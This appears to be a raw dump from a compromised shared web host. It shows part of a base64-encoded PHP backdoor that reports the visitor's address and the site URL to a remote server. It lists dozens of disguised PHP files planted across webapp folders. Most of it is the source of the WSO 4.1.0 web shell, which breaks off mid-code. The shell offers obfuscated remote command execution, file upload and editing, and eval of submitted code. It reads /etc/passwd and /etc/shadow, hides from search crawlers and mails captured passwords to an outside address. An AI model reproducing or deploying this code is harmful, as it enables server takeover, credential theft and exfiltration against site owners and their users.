FIwY0RJNkx5OD0iKS4iJHAiLmJhc2U2NF9kZWNvZGUoIkxuVnpaWEp6TG1KcGMyaGxiR3d1Y25VPSIpLiIvP3JfYWRkcj0iLnNwcmludGYoIiV1IiwgaXAybG9uZyhnZXRlbnYoUkVNT1RFX0FERFIpKSkuIiZ1cmw9Ii5iYXNlNjRfZW5jb2RlKCRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiRfU0VSVkVSW1JFUVVFU1RfVVJJXSkuJHVzZXJfYXV0aC4kbG9nX2ZsZykpe2lmKCRfUE9TVFsibCJdPT0ic3BlY2lhbCIpe3ByaW50ICJzeXNfYWN0aXZlIi5gdW5hbWUgLWFgO319fQ0K")); ?>
for files:
/home/www/confixx/html/webapps:
./knowledgetree/remote.php ./knowledgetree/download.php ./phpAds/guest.php ./phpAds/create.php ./phpMyFamily/time.php ./phpMyFamily/date.php ./CSLH/report.php ./CSLH/date.php ./weberp/system.php ./weberp/properties.php ./xoops/report.php ./xoops/include.php ./PHProjekt/time.php ./PHProjekt/date.php ./formmail/system.php ./formmail/properties.php ./xrms/includes.php ./xrms/configs.php ./classifieds/base.php ./classifieds/download.php ./HelpCenterLive/links.php ./HelpCenterLive/tests.php ./SSM/includes.php ./SSM/configs.php ./typo/links.php ./typo/tests.php ./4images/options.php ./4images/commands.php ./getid/includes.php ./getid/configs.php ./nucleus/options.php ./nucleus/commands.php ./openit/time.php ./openit/system.php ./tsep/remote.php ./tsep/package.php ./Events/remote.php ./Events/package.php ./Care2x/includes.php ./Care2x/include.php ./pmachinefree/time.php ./pmachinefree/system.php ./gallery/time.php ./gallery/date.php ./videodb/finfo.php ./videodb/contacts.php ./phpdocumentor/base.php ./phpdocumentor/create.php ./UebiMiau/finfo.php ./UebiMiau/tests.php ./Owl/system.php ./Owl/properties.php ./phpSupportTickets/report.php ./phpSupportTickets/include.php ./Links/finfo.php ./Links/contacts.php ./kplaylist/links.php ./kplaylist/package.php ./phpnuke/links.php ./phpnuke/package.php ./bbclone/messages.php ./bbclone/configs.php ./Tellme/links.php ./Tellme/package.php ./phpBugTracker/finfo.php ./phpBugTracker/contacts.php ./sendcard/report.php ./sendcard/date.php ./osCommerce/report.php ./osCommerce/date.php ./skins/includes.php ./skins/include.php ./AutoIndex/time.php ./AutoIndex/system.php ./phpWiki/includes.php ./phpWiki/configs.php ./phpmyforum/remote.php ./phpmyforum/download.php ./openbiblio/layout.php ./openbiblio/properties.php ./osTicket/includes.php ./osTicket/include.php ./phpwhois/layout.php ./phpwhois/properties.php ./AdvancedPoll/layout.php ./AdvancedPoll/properties.php ./PostNuke/report.php ./PostNuke/include.php ./phpDig/common.php ./phpDig/commands.php ./mediawiki/finfo.php ./mediawiki/tests.php ./guestbook/base.php ./guestbook/create.php ./agoracart/report.php ./agoracart/date.php ./cubecart/links.php ./cubecart/tests.php ./xaraya/time.php ./xaraya/date.php ./phpbannerexchange/guest.php ./phpbannerexchange/messages.php ./wbbook/layout.php ./wbbook/options.php ./Siteframe/guest.php ./Siteframe/messages.php ./Drupal/base.php ./Drupal/download.php ./YaBB/time.php ./YaBB/system.php ./phpBB/base.php ./phpBB/download.php ./template/guest.php ./template/create.php ./phpwcms/common.php ./phpwcms/contacts.php ./escene/layout.php ./escene/options.php ./phpwebsite/options.php ./phpwebsite/commands.php ./Coppermine/messages.php ./Coppermine/configs.php ./phpsurveyor/finfo.php ./phpsurveyor/tests.php ./creloaded/remote.php ./creloaded/package.php ./phpList/layout.php ./phpList/options.php ./phpBBAuction/remote.php ./phpBBAuction/package.php ./SupportLogic/base.php ./SupportLogic/create.php ./DocFAQ/guest.php ./DocFAQ/create.php ./gtchat/guest.php ./gtchat/messages.php ./phpMoney/system.php ./phpMoney/properties.php ./MovableType/layout.php ./MovableType/options.php ./squirrelmail/messages.php ./squirrelmail/configs.php ./topdownloads/base.php ./topdownloads/download.php ./noahclass/common.php ./noahclass/contacts.php ./Mambo/common.php ./Mambo/commands.php ./eGroupWare/common.php ./eGroupWare/commands.php ./WebCalendar/common.php ./WebCalendar/contacts.php ./b2evolution/includes.php ./b2evolution/include.php ./vstat/common.php ./vstat/commands.php ./zencart/guest.php ./zencart/messages.php ./WordPress/layout.php ./WordPress/properties.php ./phpBook/links.php ./phpBook/tests.php ./pLog/messages.php ./pLog/configs.php ./geeklog/report.php ./geeklog/include.php ./bookstore/guest.php ./bookstore/create.php ./WebShopmanager/options.php ./WebShopmanager/commands.php ./TUTOS/remote.php ./TUTOS/download.php ./dotproject/finfo.php ./dotproject/contacts.php
/home/www/confixx/html/webapps:
./report.php ./mskin_17/buttons/report.php ./mskin_17/buttons/include.php ./mskin_17/small_icons/common.php ./mskin_17/small_icons/contacts.php ./mskin_17/system.php ./mskin_17/properties.php ./mskin_17/css/left/base.php ./mskin_17/css/left/create.php ./mskin_17/css/top/links.php ./mskin_17/css/top/package.php ./mskin_17/css/help/guest.php ./mskin_17/css/help/messages.php ./mskin_17/css/includes.php ./mskin_17/css/main/remote.php ./mskin_17/css/main/download.php ./mskin_17/css/configs.php ./mskin_17/images/finfo.php ./mskin_17/images/tests.php ./mskin_17/big_icons/time.php ./mskin_17/big_icons/date.php ./include.php ./mskin_15/buttons/base.php ./mskin_15/buttons/create.php ./mskin_15/small_icons/time.php ./mskin_15/small_icons/system.php ./mskin_15/includes.php ./mskin_15/css/left/finfo.php ./mskin_15/css/left/tests.php ./mskin_15/css/top/options.php ./mskin_15/css/top/commands.php ./mskin_15/css/remote.php ./mskin_15/css/help/links.php ./mskin_15/css/help/package.php ./mskin_15/css/main/common.php ./mskin_15/css/main/contacts.php ./mskin_15/css/download.php ./mskin_15/images/layout.php ./mskin_15/images/properties.php ./mskin_15/configs.php ./mskin_15/big_icons/guest.php ./mskin_15/big_icons/messages.php
login-102.hoststar.ch
/home/www/confixx/html/nagioss -> shell
login-102.hoststar.ch
login-103.hoststar.ch
login-104.hoststar.ch
/home/www/confixx/html/post.php
<?php //-----------------Password--------------------- $â297a57a5a743894a0e4a801fc3"; //admin $â = "#fff"; $â = true; $â = 'UTF-8'; $â = 'FilesMan'; $â = md5($_SERVER['HTTP_USER_AGENT']); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) { prototype(md5($_SERVER['HTTP_HOST'])."key", $â); } if(empty($_POST['charset'])) $_POST['charset'] = $â; if (!isset($_POST['ne'])) { if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])); } function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);} @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('VERSION', '4.1.0'); if(get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } if(!empty($â if(isset($_POST['pass']) && (md5($_POST['pass']) == $â rototype(md5($_SERVER['HTTP_HOST']), $â f (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $â ardLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; function hardHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['â']; global $â; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title> <style> body {background-color:#060a10;color:#e1e1e1;} body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;} table.info {color:#C3C3C3;background-color:#060a10;} span,h1,a {color:$â !important;} span {font-weight:bolder;} h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;} div.content {padding:5px;margin-left:5px;background-color:#060a10;} a {text-decoration:none;} a:hover {text-decoration:underline;} .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;} .bigarea {width:100%;height:250px; } input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;} form {margin:0px;} #toolsTbl {text-align:center;} .toolsInp {width:300px} .main th {text-align:left;background-color:#060a10;} .main tr:hover{background-color:#354252;} .main td, th{vertical-align:middle;} .l1 {background-color:#1e252e;} pre {font:9pt Courier New;} </style> <script> var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) ."' var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; var d = document; function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);} function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;} function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;} function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."'); if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $â) $opt_charsets .= '<option value="'.$â.'" '.($_POST['charset']==$â?'selected':'').'>'.$â.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['â)) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if ($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'. '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'. '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>'; } function hardFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>"; echo " </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%> <tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td> <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMan'> <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=ne value=''> <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'> <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function ex($in) { $â = ''; if (function_exists('exec')) { @exec($in,$â); $â = @join("\n",$â); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $â = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $â = ob_get_clean(); } elseif (function_exists('shell_exec')) { $â = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $â = ""; while(!@feof($f)) $â .= fread($f,1024); pclose($f); }else return "â³ Unable to execute command\n"; return ($â==''?"â³ Query did not return anything\n":$â); } if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$â; if(array_key_exists('pff',$_POST)){ $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp); } function hardLogin() { if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>"); } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; else return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>'; } function hardScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function which($p) { $path = ex('which ' . $p); if(!empty($path)) return $path; return false; } function actionRC() { if(!@$_POST['p1']) { $a = array( "uname" => php_uname(), "php_version" => phpversion(), "VERSION" => VERSION, "safemode" => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } function actionSecInfo() { hardHeader(); echo '<h1>Server security information</h1><div class=content>'; function showSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>' . $n . ': </span>'; if(strpos($v, "\n") === false) echo $v . '<br>'; else echo '<pre class=ml1>' . $v . '</pre>'; } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; showSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if($GLOBALS['os'] == 'nix') { showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '<br>'; $temp=array(); foreach ($userful as $â) if(which($â)) $temp[] = $â; showSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $â) if(which($â)) $temp[] = $â; showSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $â) if(which($â)) $temp[] = $â; showSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; showSecParam('HDD space', ex('df -h')); showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version',ex('ver')); showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); } echo '</div>'; hardFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } hardHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return 